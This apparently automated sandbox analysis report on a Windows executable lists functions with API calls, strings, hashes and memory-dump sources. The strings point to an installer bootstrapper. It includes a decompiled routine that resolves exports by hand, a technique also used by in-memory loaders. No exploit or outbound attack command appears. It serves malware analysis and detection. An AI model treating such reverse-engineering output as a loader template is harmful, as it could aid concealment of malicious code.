                                                                                                                                                                    • Part of subcall function 00429765: __initp_misc_winsig.LIBCMT ref: 00429789
                                                                                                                                                                    • Part of subcall function 00429765: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0042A38C
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0042A3A0
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0042A3B3
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0042A3C6
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0042A3D9
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0042A3EC
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0042A3FF
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0042A412
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0042A425
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0042A438
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0042A44B
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0042A45E
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0042A471
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0042A484
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0042A497
                                                                                                                                                                    • Part of subcall function 00429765: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0042A4AA
                                                                                                                                                                  • __mtinitlocks.LIBCMT ref: 004295B0
                                                                                                                                                                    • Part of subcall function 0042C0C1: InitializeCriticalSectionAndSpinCount.KERNEL32(00456300,00000FA0,?,?,004295B5,004266A8,00454020,00000014), ref: 0042C0DF
                                                                                                                                                                  • __mtterm.LIBCMT ref: 004295B9
                                                                                                                                                                    • Part of subcall function 00429621: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,004295BE,004266A8,00454020,00000014), ref: 0042BFDD
                                                                                                                                                                    • Part of subcall function 00429621: _free.LIBCMT ref: 0042BFE4
                                                                                                                                                                    • Part of subcall function 00429621: DeleteCriticalSection.KERNEL32(00456300,?,?,004295BE,004266A8,00454020,00000014), ref: 0042C006
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 004295DE
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00429607
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$CriticalSection$Delete$CountCurrentEncodeHandleInitializeModulePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2930087205-0
                                                                                                                                                                  • Opcode ID: 9d058e35f38fa77168fb03a0bb5898be75582037b773cd5ad414bea2928eea57
                                                                                                                                                                  • Instruction ID: 407d0547cf78b29cb645a68f357a086996c9b8079edf54126a8b152600c22290
                                                                                                                                                                  • Opcode Fuzzy Hash: 9d058e35f38fa77168fb03a0bb5898be75582037b773cd5ad414bea2928eea57
                                                                                                                                                                  • Instruction Fuzzy Hash: 8BF090327597315AE6287B7A7C0769B26C48F01739FA1062FF961C62D3EF588C4151AC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041FACE, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 169COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,000000F8,00000000,?,?,?,00411168,000000B8,0000001C,000000F8), ref: 0041FAFD
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?,?,?,00411168,000000B8,0000001C,000000F8,000000F8,000000F8,000000B0), ref: 0041FB96
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to initialize update bundle., xrefs: 0041FC30
                                                                                                                                                                  • detect.cpp, xrefs: 0041FBF8
                                                                                                                                                                  • BA aborted detect forward compatible bundle., xrefs: 0041FC02
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$detect.cpp
                                                                                                                                                                  • API String ID: 1825529933-918857910
                                                                                                                                                                  • Opcode ID: e028b51d9d191877cf7cc6dfd779322877dc8448ad8e322736e2990c1c5a8c11
                                                                                                                                                                  • Instruction ID: 1beacf723be2f970fe82b456cccefcc8f340d2ed50081723a0b3ec53dcf77135
                                                                                                                                                                  • Opcode Fuzzy Hash: e028b51d9d191877cf7cc6dfd779322877dc8448ad8e322736e2990c1c5a8c11
                                                                                                                                                                  • Instruction Fuzzy Hash: 7851D271604205EFDB159F34CC91EABB7AAFF09314B10867AF815DA250D734EC92DB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001AF10, Relevance: 8.9, APIs: 7, Instructions: 168COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001AF10(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				intOrPtr* _v40;
				intOrPtr* _v44;
				intOrPtr* _t105;
				void* _t174;
				void* _t176;

				_t172 = __edi;
				_t122 = __ebx;
				_v16 = _a4;
				_t4 = _v16 + 4; // 0x7d83ec45
				_v24 =  *_t4;
				_v12 = 0;
				_v20 =  *_v16 + 0x78;
				if( *((intOrPtr*)(_v20 + 4)) != 0) {
					_v8 = _v24 +  *_v20;
					if( *(_v8 + 0x18) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
						SetLastError(0x7f);
						return 0;
					} else {
						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
							if( *(_v8 + 0x18) != 0) {
								if( *((intOrPtr*)(_v16 + 0x30)) != 0) {
									L19:
									_t70 = _v16 + 0x30; // 0x51e84d8b
									_v28 = E1000DFB8(_t122,  &_a8,  *_t70,  *(_v8 + 0x18), 8, E1001AAC0);
									if(_v28 != 0) {
										_v12 =  *(_v28 + 4) & 0x0000ffff;
										L22:
										if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
											return _v24 +  *((intOrPtr*)(_v24 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
										}
										SetLastError(0x7f);
										return 0;
									}
									SetLastError(0x7f);
									return 0;
								}
								_v36 = _v24 +  *((intOrPtr*)(_v8 + 0x20));
								_v40 = _v24 +  *((intOrPtr*)(_v8 + 0x24));
								_t105 = L1000CEAF(__ebx, _v24 +  *((intOrPtr*)(_v8 + 0x24)), __edi, __esi,  *(_v8 + 0x18) << 3);
								_t176 = _t174 + 4;
								_v44 = _t105;
								 *((intOrPtr*)(_v16 + 0x30)) = _v44;
								if(_v44 != 0) {
									_v32 = 0;
									while(_v32 <  *(_v8 + 0x18)) {
										 *_v44 = _v24 +  *_v36;
										 *((short*)(_v44 + 4)) =  *_v40;
										_v32 = _v32 + 1;
										_v36 = _v36 + 4;
										_v40 = _v40 + 2;
										_v44 = _v44 + 8;
									}
									_t66 = _v16 + 0x30; // 0x51e84d8b
									E1000DA30( *(_v8 + 0x18), _t172,  *_t66,  *(_v8 + 0x18), 8, E1001AAF0);
									_t174 = _t176 + 0x10;
									goto L19;
								}
								SetLastError(0xe);
								return 0;
							}
							SetLastError(0x7f);
							return 0;
						}
						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
							goto L22;
						}
						SetLastError(0x7f);
						return 0;
					}
				}
				SetLastError(0x7f);
				return 0;
			}
















                                                                                                                                                                  0x1001af10
                                                                                                                                                                  0x1001af10
                                                                                                                                                                  0x1001af19
                                                                                                                                                                  0x1001af1f
                                                                                                                                                                  0x1001af22
                                                                                                                                                                  0x1001af25
                                                                                                                                                                  0x1001af34
                                                                                                                                                                  0x1001af3e
                                                                                                                                                                  0x1001af57
                                                                                                                                                                  0x1001af61
                                                                                                                                                                  0x1001af6e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001af7b
                                                                                                                                                                  0x1001af86
                                                                                                                                                                  0x1001afca
                                                                                                                                                                  0x1001afe7
                                                                                                                                                                  0x1001b0a9
                                                                                                                                                                  0x1001b0ba
                                                                                                                                                                  0x1001b0ca
                                                                                                                                                                  0x1001b0d1
                                                                                                                                                                  0x1001b0e6
                                                                                                                                                                  0x1001b0e9
                                                                                                                                                                  0x1001b0f2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b112
                                                                                                                                                                  0x1001b0f6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b0fc
                                                                                                                                                                  0x1001b0d5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b0db
                                                                                                                                                                  0x1001aff6
                                                                                                                                                                  0x1001b002
                                                                                                                                                                  0x1001b00f
                                                                                                                                                                  0x1001b014
                                                                                                                                                                  0x1001b017
                                                                                                                                                                  0x1001b020
                                                                                                                                                                  0x1001b027
                                                                                                                                                                  0x1001b038
                                                                                                                                                                  0x1001b065
                                                                                                                                                                  0x1001b07b
                                                                                                                                                                  0x1001b086
                                                                                                                                                                  0x1001b047
                                                                                                                                                                  0x1001b050
                                                                                                                                                                  0x1001b059
                                                                                                                                                                  0x1001b062
                                                                                                                                                                  0x1001b062
                                                                                                                                                                  0x1001b09d
                                                                                                                                                                  0x1001b0a1
                                                                                                                                                                  0x1001b0a6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b0a6
                                                                                                                                                                  0x1001b02b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b031
                                                                                                                                                                  0x1001afce
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001afd4
                                                                                                                                                                  0x1001af99
                                                                                                                                                                  0x1001afbb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001afbb
                                                                                                                                                                  0x1001af9d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001afa3
                                                                                                                                                                  0x1001af61
                                                                                                                                                                  0x1001af42
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,1002093E), ref: 1001AF42
                                                                                                                                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,1002093E), ref: 1001AF6E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                  • Opcode ID: 5f9b1837587a101ea96a0657a83a7c2693123edf5df009f3321dc1919bef460e
                                                                                                                                                                  • Instruction ID: 27e70c85a8907a9ba83dd9d1e295feb5005e929d9b7098f35adbadc5d796aaa6
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f9b1837587a101ea96a0657a83a7c2693123edf5df009f3321dc1919bef460e
                                                                                                                                                                  • Instruction Fuzzy Hash: 3371C374A00109EFDB08CF98C995AAEB7F1FF49304F618599E915AB345D734EA81CFA0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041596E, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 147synchronizationCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Unexpected elevated message sent to child process, msg: %u, xrefs: 00415B2E
                                                                                                                                                                  • elevation.cpp, xrefs: 00415B22
                                                                                                                                                                  • Failed to save state., xrefs: 00415A30
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandleMutexRelease
                                                                                                                                                                  • String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
                                                                                                                                                                  • API String ID: 4207627910-1576875097
                                                                                                                                                                  • Opcode ID: 337ca55114011394e827b6fb290499569251ded87f33cb0f3bc1a5a95e23a21e
                                                                                                                                                                  • Instruction ID: 9efabe454db00fa631e4012d12c9fe1eba265e2e4ff0a61f78d4c74c5e4b1851
                                                                                                                                                                  • Opcode Fuzzy Hash: 337ca55114011394e827b6fb290499569251ded87f33cb0f3bc1a5a95e23a21e
                                                                                                                                                                  • Instruction Fuzzy Hash: D9511A3A104904EFCB129F44DD01D9ABBB2FF88324711C45AF99A5A632C736E861EF49
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00438829, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 145networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,90000000,0000003C), ref: 00438938
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00438942
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CrackErrorInternetLast
                                                                                                                                                                  • String ID: <$=VB$uriutil.cpp
                                                                                                                                                                  • API String ID: 3164790631-4167828551
                                                                                                                                                                  • Opcode ID: 236990b115527ae78c4e6710e633e515271245832eb49eade1c516b8f86c0db3
                                                                                                                                                                  • Instruction ID: fbe1e05fad08a91b6a36830cf35168a3176c3aefa577aa460cd84d90d772ab1b
                                                                                                                                                                  • Opcode Fuzzy Hash: 236990b115527ae78c4e6710e633e515271245832eb49eade1c516b8f86c0db3
                                                                                                                                                                  • Instruction Fuzzy Hash: DA510A71E012289BCB25DF65CC88A9EF7B8AF08744F4150EBF908A7241DB349E858F95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004213DD, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 133COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00431C19: GetModuleFileNameW.KERNEL32(r@,?,00000104,?,00000104,?,00000000,00401C5F,?,004072ED,?,00000000,?,?,?,00401C5F), ref: 00431C3A
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,?,00000001,?,?,00000001,?,?,00000000,?,?), ref: 00421485
                                                                                                                                                                    • Part of subcall function 00431437: CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,00000000,000000FF,00000000,00000000,00000003,00000000,00000000,00000003,00000000), ref: 0043147B
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to open container: %ls., xrefs: 0042144A
                                                                                                                                                                  • Failed to extract all payloads from container: %ls, xrefs: 00421503
                                                                                                                                                                  • Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 004214E2
                                                                                                                                                                  • Failed to extract payload: %ls from container: %ls, xrefs: 004214D6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString$FileModuleName
                                                                                                                                                                  • String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
                                                                                                                                                                  • API String ID: 3080012752-3891707333
                                                                                                                                                                  • Opcode ID: 157058c53c7f2fcf5bfaa743aff7e7a0b471f1369a6864f9dbbe89f6c4653c9a
                                                                                                                                                                  • Instruction ID: 2d3af718b1c4c621f4b463685eefd2ceba7b58b1a882d1408b5396fd61806a25
                                                                                                                                                                  • Opcode Fuzzy Hash: 157058c53c7f2fcf5bfaa743aff7e7a0b471f1369a6864f9dbbe89f6c4653c9a
                                                                                                                                                                  • Instruction Fuzzy Hash: D241B132E0022ABBCF11AEE5DC85DCEB7B8AF14314FA00567F915A7160D738DA548B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00434262, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00430816,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00430816,004079F6,00000000,00000000), ref: 004342A8
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00430816,004079F6,00000000,00000000,0000FDE9), ref: 004342B4
                                                                                                                                                                    • Part of subcall function 00431231: GetProcessHeap.KERNEL32(00000000,0000005A,?,00434024,0000005A,8007000D,8007000D,00401C5F,?,00430A87,8007000D,?,00000000,00000000,8007000D), ref: 00431239
                                                                                                                                                                    • Part of subcall function 00431231: HeapSize.KERNEL32(00000000,?,00434024,0000005A,8007000D,8007000D,00401C5F,?,00430A87,8007000D,?,00000000,00000000,8007000D), ref: 00431240
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                                                                  • String ID: strutil.cpp
                                                                                                                                                                  • API String ID: 3662877508-3612885251
                                                                                                                                                                  • Opcode ID: bec6d4f255c72d96015216a3b88215ff1bdb24816193f3cc259c3a7c543c6802
                                                                                                                                                                  • Instruction ID: cb50fe60dc414d63efb4eec03f7e4423f18f6aa5d2c9d6f9c414fe149ca9a8e3
                                                                                                                                                                  • Opcode Fuzzy Hash: bec6d4f255c72d96015216a3b88215ff1bdb24816193f3cc259c3a7c543c6802
                                                                                                                                                                  • Instruction Fuzzy Hash: 2231A931300215AFEB009E799C84ABB77D9EF883A4F10536AFD11DB2A0D675AC518669
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042345D, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 004234FF
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 00423509
                                                                                                                                                                  Strings
                                                                                                                                                                  • cabextract.cpp, xrefs: 0042352D
                                                                                                                                                                  • Invalid seek type., xrefs: 00423495
                                                                                                                                                                  • Failed to move file pointer 0x%x bytes., xrefs: 0042353A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                  • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                                                                                                                                  • API String ID: 2976181284-417918914
                                                                                                                                                                  • Opcode ID: 6971c8605748c22e16099d1cb48f70ffdfc40b8129b0ccb39bf1ac076b658859
                                                                                                                                                                  • Instruction ID: cb95d66a5c80b93c34289464988e3f1907707cb71569b5b53f52a2675c44839d
                                                                                                                                                                  • Opcode Fuzzy Hash: 6971c8605748c22e16099d1cb48f70ffdfc40b8129b0ccb39bf1ac076b658859
                                                                                                                                                                  • Instruction Fuzzy Hash: DA31A331B00629FFCB05DF99EC41E5AB7B5FF08765B108156F915D7250D738EA108B94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409EDF, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 93COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00431D07: SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00413C09,0000001C,00000000,00000000,?,?,0040A090), ref: 00431D27
                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(00000002,00000001,00000002,00401414,00000001,00401414,?,00000002,0000001C,00401414,00020006,00000001,00000000,00401414), ref: 00409F7C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DirectoryFolderPathRemove
                                                                                                                                                                  • String ID: Failed to allocate regid folder path.$Failed to find local %hs appdata directory.$per-machine$per-user
                                                                                                                                                                  • API String ID: 293476170-2037127396
                                                                                                                                                                  • Opcode ID: a54171950a7683aeeb5f7605ee77cb92536082e0233860766d92b7fd32dba6e9
                                                                                                                                                                  • Instruction ID: ad3813ef0561ff1b8f741760b1a52c5b9f474fd6d7c09b8fb3467c9423426923
                                                                                                                                                                  • Opcode Fuzzy Hash: a54171950a7683aeeb5f7605ee77cb92536082e0233860766d92b7fd32dba6e9
                                                                                                                                                                  • Instruction Fuzzy Hash: F7318F71900219FBDB11AF95D841A9EBBB8EF45314F11807BF800EB262D779DE80DB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041F98E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,000002A8,000000F8,0000035C), ref: 0041FA0D
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,000002A8,000000F8,0000035C,?,?,?,0040A608,00000001,000002A8,0000035C,00000000), ref: 0041FA5B
                                                                                                                                                                  Strings
                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041F9AF
                                                                                                                                                                  • Failed to enumerate uninstall key for related bundles., xrefs: 0041FA6A
                                                                                                                                                                  • Failed to open uninstall registry key., xrefs: 0041F9D5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
